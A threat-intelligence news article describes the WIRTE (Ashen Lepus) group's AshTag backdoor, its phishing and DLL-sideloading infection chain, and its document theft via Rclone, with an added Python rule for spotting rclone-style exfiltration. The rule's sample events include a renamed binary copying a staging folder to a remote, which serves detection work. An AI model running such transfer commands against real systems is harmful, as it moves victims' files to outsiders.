
WIRTE APT Targets Middle East with AshTag Malware Since 2020

WIRTE's AshTag Malware Suite Targets Middle Eastern Governments for Espionage Amid Ongoing Regional Conflicts

  • An advanced persistent threat group named WIRTE has been using a new malware suite called AshTag to attack Middle Eastern government and diplomatic targets since 2020.
  • Palo Alto Networks tracks this group as Ashen Lepus, which continues to operate actively, including during and after the 2025 Israel-Hamas conflict.
  • The campaign expanded its targets to Oman and Morocco, in addition to its earlier focus on the Palestinian Authority, Jordan, Iraq, Saudi Arabia, and Egypt.
  • AshTag operates as a modular .NET backdoor enabling persistence and remote control by masquerading as legitimate software, and it is deployed via malicious emails carrying geopolitical lures.
  • The threat actor engages in espionage centered on intelligence collection, stealing sensitive documents using hands-on techniques and specialized tools for data exfiltration.

Since 2020, the advanced persistent threat group WIRTE has targeted government and diplomatic organizations across the Middle East with a previously unknown malware suite named AshTag. This campaign has been linked to espionage efforts aimed at intelligence collection. Palo Alto Networks identifies the activity cluster behind these attacks as Ashen Lepus.


According to a detailed report shared with The Hacker News, Ashen Lepus expanded its operations to Oman and Morocco, broadening its geographical focus beyond the Palestinian Authority, Jordan, Iraq, Saudi Arabia, and Egypt. The group remained active even throughout the Israel-Hamas conflict of 2025 and continued deploying new malware variants after the October Gaza ceasefire.

WIRTE overlaps with groups such as Gaza Cyber Gang, also known by names like Blackstem, Molerats, and TA402, and has been active since at least 2018. These factions are politically motivated and linked to Hamas cyberwarfare divisions. Their attacks focus on espionage and intelligence gathering, frequently using phishing emails that contain geopolitical topics as bait. Recent email lures have targeted issues related to Turkey, suggesting a possible new focus area.

The attack starts with a decoy PDF attached to phishing emails, leading victims to download a RAR archive. This triggers a multi-stage infection that sideloads a malicious DLL named AshenLoader, which drops other components, including AshenStager, to execute the malware in memory. The AshTag backdoor is a modular .NET framework that enables persistence, remote command execution, screen capture, file management, system fingerprinting, and updating or removal of components. It disguises itself as a legitimate VisualServer utility to evade detection.

In some cases, Ashen Lepus operators have been observed manually accessing compromised machines to steal documents. Sensitive files, including diplomacy-related materials obtained from victim email inboxes, were staged locally and then exfiltrated to attacker-controlled servers using the Rclone utility.
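
One way to hunt for the Rclone-based exfiltration described above, as an added example that is not from the report or the original article: it scores process-creation events for rclone-style transfer command lines, including ones run under a different image name. The event fields, scoring weights, staging-directory hints and sample events are assumptions constructed for illustration.

```python
import re
import shlex

TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}   # rclone subcommands
RCLONE_FLAGS = {"--config", "--transfers", "--bwlimit", "--no-check-certificate"}
# rclone remotes look like "name:path"; drive letters (C:\) and URLs are excluded.
REMOTE_RE = re.compile(r"^[A-Za-z0-9_-]{2,}:(?!//)[^\\]*$")
# Assumption: user-writable directories treated as likely staging locations.
STAGING_HINTS = (r"\users\public", r"\programdata", r"\appdata\local\temp")

def score_event(image, cmdline):
    """Score one process-creation event; returns (score, reasons)."""
    args = [a.strip('"') for a in shlex.split(cmdline, posix=False)][1:]
    lowered = [a.lower() for a in args]
    has_verb = any(a in TRANSFER_VERBS for a in lowered)
    has_remote = any(REMOTE_RE.match(a) for a in args)
    if not (has_verb and has_remote):
        return 0, []
    score, reasons = 2, ["transfer verb with name:path remote"]
    if any(a.split("=", 1)[0] in RCLONE_FLAGS for a in lowered):
        score += 1
        reasons.append("rclone-specific flag")
    exe = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe not in ("rclone.exe", "rclone"):
        score += 2
        reasons.append("rclone-style command line under another image name")
    if any(h in a for a in lowered for h in STAGING_HINTS):
        score += 1
        reasons.append("source in user-writable staging directory")
    return score, reasons

def flag_events(events, threshold=3):
    """Return the events whose score meets the threshold."""
    return [e for e in events if score_event(e["image"], e["cmdline"])[0] >= threshold]

# Constructed sample events (not taken from the report).
SAMPLE_EVENTS = [
    {"image": r"C:\Users\Public\svc.exe",
     "cmdline": r"svc.exe copy C:\Users\Public\stage remote1:in --transfers 8 --no-check-certificate"},
    {"image": r"C:\Program Files\rclone\rclone.exe",
     "cmdline": r"rclone.exe sync D:\backups nas:backups"},
    {"image": r"C:\Windows\System32\xcopy.exe",
     "cmdline": r"xcopy.exe C:\data D:\data /E"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(score_event(event["image"], event["cmdline"]), event["image"])
```

A plain rclone backup job scores below the default threshold, so the rule surfaces the renamed-binary and staging-directory cases first; tune the threshold to how rclone is legitimately used in the environment.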


As described, “Ashen Lepus remains a persistent espionage actor, demonstrating a clear intent to continue its operations throughout the recent regional conflict — unlike other affiliated threat groups, whose activity significantly decreased.” The group’s continued campaigns reflect a strong commitment to ongoing intelligence collection.
